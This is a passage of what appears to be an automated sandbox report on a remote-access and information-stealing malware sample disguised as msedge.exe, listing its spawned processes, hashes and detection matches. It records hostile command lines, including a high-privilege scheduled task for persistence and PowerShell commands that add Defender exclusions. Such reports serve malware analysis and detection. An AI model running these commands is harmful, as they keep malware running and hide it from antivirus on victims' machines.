                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:12:19:12
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:12:19:13
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                        Imagebase:0xd50000
                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:13:56:01
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:13:56:01
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:13:56:01
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Edge\msedge.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Edge/msedge.exe"
                                                                                                                                                                        Imagebase:0xb90000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        • Detection: 74%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:13:56:04
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"
                                                                                                                                                                        Imagebase:0x7ff7e2090000
                                                                                                                                                                        File size:2'759'232 bytes
                                                                                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:13:56:04
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:13:56:05
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
                                                                                                                                                                        Imagebase:0x7ff67ffc0000
                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:23
                                                                                                                                                                        Start time:13:56:05
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"
                                                                                                                                                                        Imagebase:0x7ff7e2090000
                                                                                                                                                                        File size:2'759'232 bytes
                                                                                                                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:13:56:05
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:25
                                                                                                                                                                        Start time:13:56:05
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
                                                                                                                                                                        Imagebase:0x7ff67ffc0000
                                                                                                                                                                        File size:52'744 bytes
                                                                                                                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:28
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
                                                                                                                                                                        Imagebase:0x7ff67a480000
                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:29
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'
                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:30
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                                                                                                                                                        Imagebase:0x7ff741d30000
                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:31
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:32
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:33
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat"
                                                                                                                                                                        Imagebase:0x7ff722710000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:34
                                                                                                                                                                        Start time:13:56:06
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:35
                                                                                                                                                                        Start time:13:56:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        • Detection: 74%, ReversingLabs
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:36
                                                                                                                                                                        Start time:13:56:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:chcp 65001
                                                                                                                                                                        Imagebase:0x7ff605410000
                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:37
                                                                                                                                                                        Start time:13:56:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:38
                                                                                                                                                                        Start time:13:56:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Edge\msedge.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Edge\msedge.exe
                                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:39
                                                                                                                                                                        Start time:13:56:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Edge\msedge.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Edge\msedge.exe
                                                                                                                                                                        Imagebase:0x890000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:40
                                                                                                                                                                        Start time:13:56:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:ping -n 10 localhost
                                                                                                                                                                        Imagebase:0x7ff6480f0000
                                                                                                                                                                        File size:22'528 bytes
                                                                                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:41
                                                                                                                                                                        Start time:13:56:10
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                        Imagebase:0x7ff7fb730000
                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:42
                                                                                                                                                                        Start time:13:56:17
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Edge\msedge.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                        Imagebase:0x3d0000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:43
                                                                                                                                                                        Start time:13:56:17
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                                        Imagebase:0x280000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:44
                                                                                                                                                                        Start time:13:56:22
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
                                                                                                                                                                        Imagebase:0x7ff722710000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:45
                                                                                                                                                                        Start time:13:56:22
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:46
                                                                                                                                                                        Start time:13:56:22
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:chcp 65001
                                                                                                                                                                        Imagebase:0x7ff605410000
                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:47
                                                                                                                                                                        Start time:13:56:22
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                        Imagebase:0x7ff738fb0000
                                                                                                                                                                        File size:108'032 bytes
                                                                                                                                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:49
                                                                                                                                                                        Start time:13:56:26
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Edge\msedge.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:50
                                                                                                                                                                        Start time:13:56:30
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:51
                                                                                                                                                                        Start time:13:56:35
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                                                                                                                                                        Imagebase:0x5a0000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:54
                                                                                                                                                                        Start time:13:56:43
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Edge\msedge.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Edge\msedge.exe"
                                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                                        File size:1'963'008 bytes
                                                                                                                                                                        MD5 hash:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:55
                                                                                                                                                                        Start time:13:56:46
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
                                                                                                                                                                        Imagebase:0x7ff722710000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:56
                                                                                                                                                                        Start time:13:56:46
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:57
                                                                                                                                                                        Start time:13:56:46
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\chcp.com
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:chcp 65001
                                                                                                                                                                        Imagebase:0x7ff605410000
                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:58
                                                                                                                                                                        Start time:13:56:46
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\w32tm.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                        Imagebase:0x7ff738fb0000
                                                                                                                                                                        File size:108'032 bytes
                                                                                                                                                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:71
                                                                                                                                                                        Start time:13:57:03
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
